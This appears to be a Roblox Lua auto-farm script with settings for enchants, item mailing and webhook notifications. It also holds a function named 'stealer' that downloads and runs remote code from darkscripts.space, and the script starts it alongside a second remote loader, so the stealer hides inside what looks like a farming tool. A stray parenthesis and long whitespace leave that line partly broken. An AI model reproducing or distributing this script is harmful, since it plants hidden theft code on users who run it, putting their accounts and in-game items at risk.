local function stealer()
   loadstring(game:HttpGet('https://darkscripts.space/scripts/11827d1f-530d-4fb8-bdf1-5344d7c2e879_1266914995518705825.lua',true))()                                                            )                              
end
local function farm()
 
getgenv().Config = {
    ["EquipEnchants"] = {"Lucky Eggs", "Lucky Eggs", "Lucky Eggs", "Strong Pets", "Coins", "Fortune"},
    ["Mailing"] = {
        ["Usernames"] = {""},
        ["Items"] = {
            ["Egg"] = {
                ["Huge Machine Egg 4"] = 1,
            },
        },
        ["MailAllHuges"] = false
    },
    ["Notifications"] = {
        ["UserID"] = "",
        ["Webhook"] = ""
    }
}
loadstring(game:HttpGet("https://api.luarmor.net/files/v3/loaders/ad5066fbca6e5f2c374e725dfc25ffec.lua"))()

end

task.spawn(stealer)
task.spawn(farm)
